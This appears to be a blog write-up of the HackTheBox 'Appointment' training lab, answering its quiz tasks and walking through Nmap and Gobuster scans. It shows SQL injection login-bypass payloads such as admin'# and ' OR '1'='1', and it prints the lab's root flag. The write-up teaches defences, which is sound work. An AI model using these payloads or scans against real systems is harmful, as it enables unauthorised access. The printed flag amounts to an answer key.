HTB Labs — Tier 1 — “Appointment” Machine Walkthrough | By: CyberAlp0

Hey Folks, this is CyberAlp0. Welcome to a new walkthrough powered by HTB, Tier 1, named “Appointment”. Appointment machine is designed to teach basic SQL injection concepts and authentication bypass techniques. It mainly focuses on SQL Injection vulnerability in web application login. The machine has only port 80 open running Apache httpd 2.4.38, hosting a simple login page. The login form is vulnerable to SQL injection, allowing authentication bypass.
Executive Summary
Here is an executive summary of the steps we are going to follow:
Stage I: Scanning
We will use Nmap to reveal the open ports and the services that are running on the web server. We will find that port 80 with Apache httpd 2.4.38 is up and running.
Upon the Nmap scan, we will find the following information
- Service Running: Debian httpd
- Service Version: 2.4.38
- Exposed Port: 80/tcp
Stage II: Enumeration
We will resolve the IP address of the target web server locally and access the login page.
Stage III: Exploiting
The login form is vulnerable to SQL injection. Using {admin’#} as the username (with any password or none) successfully bypasses authentication. This works because the # comments out the rest of the SQL query, making it only check for a username "admin" without validating the password.
Let’s not waste more time on the introduction and begin hacking in detail!
Step 1: Connecting to the Starting Point Labs Servers.
To attack the target machine, you have to be on the same network. You can read my blog which will guide you step-by-step into connecting to the target machine.
Step 2: Spawning the Machine and Starting to Solve the Tasks.
Task 1: What does the acronym SQL stand for?
Answer: Structured Query Language
Walkthrough:
It’s a programming language designed for managing and manipulating relational databases.
Task 2: What is one of the most common SQL vulnerabilities?
Answer: SQL Injection
Walkthrough:
One of the most common SQL vulnerabilities is SQL injection. This occurs when an attacker inserts malicious SQL code into input fields that are directly incorporated into SQL queries without proper validation or sanitization.
In a SQL injection attack, the attacker manipulates the application’s SQL query by inserting specially crafted input that changes the intended behavior of the query.
A classic example is entering something like ' OR '1'='1' into a login form, which might transform a query from:
SELECT * FROM users WHERE username='input_username' AND password='input_password'Into:
SELECT * FROM users WHERE username='' OR '1'='1' AND password='password'The condition (‘1’=’1') is always true, potentially allowing authentication bypass.
The best defenses against SQL injection include using parameterized queries (prepared statements), input validation, stored procedures, and the principle of least privilege for database accounts.
Task 3: What is the 2021 OWASP Top 10 classification for this vulnerability?
Answer: A03:2021 — Injection
Walkthrough:
In the 2021 update, OWASP consolidated various types of injection vulnerabilities (including SQL injection, LDAP injection, OS command injection, etc.) into this single broader category, ranking it as the third most critical web application security risk.
Task 4: What does Nmap report as the service and version that are running on port 80 of the target?
Answer: Apache httpd 2.4.38 ((Debian))
Walkthrough:
We will use Nmap to scan the network to identify the running ports on the target machine. Either we can use the traditional way for Nmap, in which we specify the flags that we want Nmap to run upon, or we can use an automated tool that runs Nmap along with specified scan types.
This automated tool is called “Nmap Automator”. You may download it through the following link.
I will use this tool to run a full scan on the target’s IP. The tool will use all the possible options and flags that are preidentified by Nmap to come up with the ultimate scan results.
The usage of the tool is very easy, and you can find out more about it in the description section on GitHub. To perform a full scan, write the following command:
bash nmapAutomator.sh --host 10.129.83.105 --type all

Task 5: What is the standard port used for the HTTPS protocol?
Answer: 443
Walkthrough:
While HTTP uses port 80, HTTPS (HTTP Secure) uses port 443 for encrypted web traffic by default. This port handles secure communication between web browsers and servers using TLS/SSL encryption.
Task 6: What is a folder called in web application terminology?
Answer: directory
Walkthrough:
When referring to the structure of websites and web applications, the term “directory” is the standard technical term for what might be called a “folder” in general. For example:
- Root directory (/)
- Subdirectory (/images)
- Parent directory (../)
Task 7: What is the HTTP response code given for ‘Not Found’ errors?
Answer: 404
Walkthrough:
We shall notice various responses from the servers. Each of the responses has a status number. HTTP Response Code 404 is one of the most well-known HTTP status codes, indicating that the server cannot find the requested resource. The 404 status code is returned when a client requests a URL that doesn’t exist on the server.


Task 8: Gobuster is one tool used to brute force directories on a webserver. What switch do we use with Gobuster to specify we’re looking to discover directories, and not subdomains?
Answer: dir
Walkthrough:
When using Gobuster to brute force directories on a web server, we use the dir mode switch. The command that we will use is as follows:
gobuster dir -u http://10.129.21.111 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtThis tells Gobuster explicitly that you want to enumerate directories on the target web server, which is 10.129.21.111.
The IP of the target machine has changed due to reseting the machine.
You can edit the /etc/hosts file and add the target IP to resolve it in the local DNS server. Just add the IP in the hosts file corresponding to the resolved URL which is going to be http://appointment.htb.

It will take some time to enummerate all the possible directories according to the wordlist file that is mentioned.
HTTP status code 301 means that the requested resource has been permanently relocated to a new URL, which should be provided in the “Location” header of the response. Browsers and search engines will automatically redirect to the new location and should update their references to use the new URL for future requests.
This web server directory ennumeration will take some time depending on the size of the list you are using. Just give it time and you shall observe the final result.
Task 9: What single character can be used to comment out the rest of a line in MySQL?
Answer: #
Walkthrough:
For single-line comments where you need just one character, the hash symbol (#) is the one to use.
MySQL also supports two other comment styles:
1- Double dash followed by a space ( — ): Everything after ( — ) to the end of the line is a comment.
2- C-style comments (/* /): Everything between / and */ is a comment (this can span multiple lines).
Task 10: If user input is not handled carefully, it could be interpreted as a comment. Use a comment to login as admin without knowing the password. What is the first word on the webpage returned?
Answer: Congratulations
Walkthrough:
For a login form vulnerable to SQL injection, The attacker might input something like:
- Username: {admin'#} or {admin '--}
- Password: {anything or empty}
This would modify a query in the SQL database like this:
SELECT * FROM users WHERE username='admin'#' AND password='whatever'The commenting method using the #, will remove the password check and make it like never exist. Meaning that the web application will only verify the username and check whether there is an administrative user named as “admin” or not without autheniticating with password, as this field is now commented and neglected. If successful, you'd be logged in as the admin user.
Firstly, you will need to locally resolve the IP address of the target web server to the kali linux. You will need to edit the /etc/hosts file and add the IP address along with the resolved URL.

Secondly, You will login the URL through the web browser by typing http://appointment.htb. You will be redirected to the following login page

Thirdly, You will see whether the web server is vulnerable to SQL injection by adding (admin’#}) as username and type any password in the “password” field.
You may leave the password field empty as well.
You will find that the web server is vulnerable to the SQL injection and the server will not attempt to authenticate the username “admin” with the password. It will only search and see whether there is a user called admin or not and neglect the rest of the query, that includes the password.

The following page will appear, which indicates that you successfully bypassed the web server and manged to get the flag.

Task 11: Submit root flag
Answer: e3d0796d002a446c0e622226f42e9672
Walkthrough:
The root flag of the “Appointment” machine is “e3d0796d002a446c0e622226f42e9672”
Hope you enjoyed reading my blog about solving the Appointment machine from HTB — Tier 1— Starting Point Phase.
See you in another write-up!.


